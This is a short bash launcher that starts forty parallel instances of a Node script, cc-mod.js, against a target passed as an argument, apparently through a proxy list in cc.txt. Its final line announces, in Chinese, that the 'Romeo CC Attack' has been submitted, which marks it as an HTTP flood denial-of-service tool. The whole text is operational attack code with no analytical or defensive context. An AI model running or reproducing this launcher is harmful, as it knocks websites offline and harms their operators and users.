#!/bin/bash
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
node cc-mod.js $1 cc.txt $2 GET &
echo  'Romeo CC Attack 已提交成功'